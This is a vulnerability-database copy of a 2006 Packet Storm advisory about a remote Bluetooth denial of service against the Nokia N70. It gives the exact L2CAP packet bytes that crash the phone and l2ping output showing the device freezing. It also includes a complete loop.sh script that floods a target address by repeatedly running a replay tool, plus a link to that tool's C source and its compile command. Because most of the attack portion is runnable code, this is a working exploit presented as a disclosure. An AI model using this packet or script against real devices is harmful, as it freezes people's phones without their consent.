Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

155022006-nokia_n70.txt

🗓️ 25 Feb 2006 00:00:00Reported by Pierre BETOUINType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Bluetooth Stack on Nokia N70 vulnerability causing remote Denial of Servic

Code
`[Software affected] Bluetooth Stack on Nokia cell phones  
  
[Version] Nokia N70 and maybe other models  
  
[Impact] Remote Denial of Service, cellular phones begin to be slower and then freeze after a short period (within 30 seconds).  
  
[Credits] Pierre Betouin - [email protected] - Bug found with BSS new release v0.8 GPL fuzzer (Bluetooh Stack Smasher - Linux)   
  
BSS could be downloaded on http://www.secuobs.com/news/15022006-bss_0_8.shtml  
  
[Vendor] notified now  
  
[Original advisory]  
  
http://www.secuobs.com/news/15022006-nokia_n70.shtml#english  
http://www.secuobs.com/news/15022006-nokia_n70.shtml#french  
  
[Concept]  
  
L2CAP packets responsible of the crash are :  
  
7D AF 00 00 41 41 41  
  
Where:  
  
Code field 0x7D (1 byte)  
Ident field 0xAF (1 byte)  
Length field 0x0000 (2 bytes)  
  
0x41 bytes are random padding.  
  
  
[Proof of Concept]  
  
# l2ping -c 3 00:15:A0:XX:XX:XX  
  
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...  
  
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms  
  
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms  
  
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms  
  
3 sent, 3 received, 0% loss  
  
# ./loop.sh 00:15:A0:XX:XX:XX  
  
(.. snip ..)  
  
# l2ping -c 1 00:15:A0:XX:XX:XX  
  
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...  
  
no response from 00:15:A0:XX:XX:XX id 0  
  
1 sent, 0 received, 100% loss   
  
  
[replay_l2cap_packet_nokiaN70.c] could be downloaded on http://www.secuobs.com/replay_l2cap_packet_nokiaN70.c  
  
[Loop.sh] as follows :   
  
#!/bin/bash  
  
# Another Nokia N70 Bluetooth remote Denial of Service  
  
# Pierre BETOUIN [email protected]  
  
# Feb 14 11:21:58 GMT+1 2006  
  
echo "Another Nokia N70 Bluetooth remote Denial of Service"  
  
echo "Pierre BETOUIN [email protected]"  
  
echo ""  
  
if (( $# < 1 )); then  
  
echo "Usage: $0 (uses replay_l2cap_packet_nokiaN70)"  
  
exit  
  
fi  
  
if [ -x ./replay_l2cap_packet_nokiaN70 ]; then  
  
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."  
  
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"  
  
echo ""  
  
read  
  
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)  
  
./replay_l2cap_packet_nokiaN70 $1  
  
done  
  
else  
  
echo "You must compile replay_l2cap_packet_nokiaN70 before"  
  
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"  
  
exit  
  
fi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
nokia cell phonesbluetooth stackremote denial of service
44